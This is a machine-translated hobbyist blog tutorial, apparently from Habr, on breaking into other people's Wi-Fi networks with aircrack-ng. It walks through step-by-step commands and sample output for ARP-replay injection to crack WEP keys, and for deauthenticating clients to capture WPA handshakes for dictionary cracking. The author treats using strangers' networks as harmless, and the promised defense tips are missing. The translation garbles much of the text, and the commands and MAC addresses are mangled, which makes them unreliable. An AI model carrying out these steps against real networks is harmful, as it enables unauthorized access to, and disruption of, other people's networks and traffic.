13:17 The attack on the wireless network a little less theory and a little more practice | |
In general, the theory and process of the attack is well described by user n3m0 in their articles, "Attacks on wireless networks, so I will not focus on the many theoretical aspects. I want to describe the most simple ways to circumvent the protection, but in more detail. -1. A couple of words on my ownI want to say that I am categorically against the abuse of such actions. Even in large cities is now largely governed by Sir "unlimited internet" (which is why my conscience is quiet, peaceful sleep), but still not worth mischief and abuse, especially as it can go sideways, as I write below ... Otherwise Well, I do not see anything wrong, and I believe that such action is equivalent to how to get warm in the winter in a strange battery))) I will not discuss all sorts of nuances and pitfalls that may be encountered on the way, those who wants - will understand themselves, others will be harder to sleep at night:) I also want to note that I am not a "Cool hatsker" and not in any way associated with wireless networks and information security. Just after buying a netbook, this issue has become for me, relevant and interesting, and that prompted me to fix it. Well, now I wanted to share with Habra public. This is my first article, so much do not hurt:)) Here we go! 0. Stored basic softwareThere are many programs for this kind of action, but we will use the package Aircrack-ng, which already have everything we need. This program is developed under Linux, although there is a version and under Windu, but as I understand it is not specifically supported, and not really working))) kachivaet and collect the latest available at the moment version rc3 (from 26.03.09): wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz tar-zxvf aircrack-ng-1.0-rc3 . tar.gz cd aircrack-ng-1.0-rc3 make make install UPD. If you do not want to bother with the source, then there is the possibility to get aircrack-ng from the repositories for your distribution. For example, in Ubuntu 8.10 repositories currently available version of rc2, which can be downloaded and installed using the command:sudo apt-get install aircrack-ngAlthough the developers recommend using the latest version, as It fixes many bugs and added many improvements. 1. Collect informationFirst you need to translate our wi-fi card in the mode of «monitor mode» In my case (c driver Madwifi-ng) you can do it: sudo wlanconfig ath0 destroy sudo wlanconfig ath0 create wlandev wifi0 wlanmode monitor Now we need a program to monitor all wireless networks in range of our Wi-Fi adapter. Personally, I like to use Airodump-ng of the previously downloaded software package Aircrack-ng. Run airodump enter an optional parameter - the name of the user interface (in this case ath0): sudo airodump-ng ath0 What do we see? Our card is switched from channel to channel and displays all activity within our grasp. The top half shows the discovered access points found at the bottom of customers (in this case found 3 clients, none of which will not connect): It just seems to mean that the plate looks like it is not clear, in fact, all simple, here basic values ??which we are interested:
2. Choosing a victim: DSo, what do we have? To proceed, we need to choose our sacrifice ... To be sure, a very important criterion is the signal level. If the signal is below 5.10, there is nothing good from vzaimodestvy with this network will not leave ... The next step is looking at the encryption algorithm (ENC):
As I wrote above, most of us are interested in a network with WEP encryption, so with them and begin to ... 3. Hi WEP!I will not describe how to cope with the SSID Cloaking, MAC Filtering, and other potential obstacles, it is enough to read articles n3m0 or documentation for aircrack, so let's get straight to business. Without going into details, hacking wep network reduces to collect enough packets, so you can just sit and wait patiently until the right amount of self-typed, but if between the access point and client, there is no activity, then we can sit for a week so ... Therefore, we need packets will be generated by not without our help:) So begin: Following is an example taken from the site of aircrack-ng.org. Hacking exposed network name (essid) - teddy, MAC address (bssid) - 00:14:6 C: 7E: 40:80, and "living" on the 9th channel. All these data are using airodump (see paragraph 1 - "Collecting information") Run airodump aimed at selected network, located on the ninth channel, with address access points, and the file name which will be recorded caught Packages : sudo airodump-ng-c 9 - bssid 00:14:6 C: 7E: 40:80-w output ath0 Next, run the new terminal aireplay, to make friends with the access point aireplay-ng -1 0-e teddy-a 00:14:6 C: 7E: 40:80-h 00:0 F: B5: 88: AC: 82 ath0where: -e teddy - the name of the network -a 00:14:6 C: 7E: 40:80 - MAC access points -h 00:0 F: B5: 88: AC: 82 - our MAC The output should have: 18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful :-) Now you can begin to create spurious traffic, again opens a new window: aireplay-ng -3-b 00:14:6 C: 7E: 40:80-h 00:0 F: B5: 88: AC: 82 ath0 Ideally, the output should get about this: Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump- ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets ... Now, switch to the window in which we run airodump and contemplate the wildly growing (at an appropriate level signal), the number of packets. Usually suffices 20,000 packages to find the 64-bit key. When the desired number of packages collected that shows airodump in column "# Data", run aircrack-ng and enjoy the process of finding the password: aircrack-ng-z output *. cap UPD. Password in most cases returned in hexadecimal format, because most routers carry your password in HEX each in its own way, so to translate the values ??back into ASCII often not possible, although in some cases, the original password is written in brackets next to each other. That's all. This password can be easily entered, only the colon removed. Under favorable conditions, is absolutely nothing complicated:) If no password is found, as aircrack tell us more likely to catch some more packages, for example 40000. 4. Inaccessible WPA/WPA2In this case, it looks a lot easier, but the final result to come much harder. To get started, as usual, run airodump aimed at selected network ... In the case of WPA/WPA2 collection package fails to budge, we need a client connected to the network, as if to speak more precisely, we must catch the moment a client to connect to the network. If the customer is not present, then sitting and waiting ... If the client is already connected, run aireplay and terminated its authentication, thereby forcing it to connect again: aireplay-ng -0 1-a 00:14:6 C: 7E: 40:80-c 00: 0F: B5: FD: FB: C2 ath0where: -a 00:14:6 C: 7E: 40:80 - MAC access points -c 00:0 F: B5 : FD: FB: C2 - MAC client And the output you get: 11:09:28 Sending DeAuth to station - STMAC: [00:0 F: B5: 34:30: 30] Ideally we should get so-called handshake, as we again notified airodump, displaying the very top of the right message «WPA handshake: 00:14:6 C: 7E: 40:80». If this does not happen again use aireplay. When the handshake is caught, run aircrack, but this time using the dictionary: aircrack-ng-w password.lst-b 00:14:6 C: 7E: 40:80 output *. cap In this case, the result depends on the availability of the necessary password in our vocabulary, so our chances are directly proportional to the size and quality of our vocabulary ... Dictionaries can be easily found on the Internet, plus archives of aircrack-ng is a small lie:) 5. A few words about defenseA few tips for those who absolutely do not want to let outsiders to its trough:
6. ConclusionHere like and all ... These were the easiest way to get around and to strengthen the protection, but even they do not always work. For those who want to know more, I advise you to visit the site http://www.aircrack-ng.org/ As a result, we found that WEP is the most favorable for breaking protocol. My personal record - about 5-7 minutes:) But this does not mean that we should blindly, to escape and move to WPA2 ... experience shows that most people do not even know how to install windows, then really nothing to talk about hacking wi -fi:))) Once again I want to say about the abuse. If by that you do not stop, even moral and ethical side of the issue, keep in mind that for some circumstances, you may lose many of your passwords (icq, contacts, etc.) ... this also applies to the fans to enjoy the open wi-fi Networks ... But what I will write the next article. I hope it was interesting:) | |
|
| |
| Total comments: 0 | |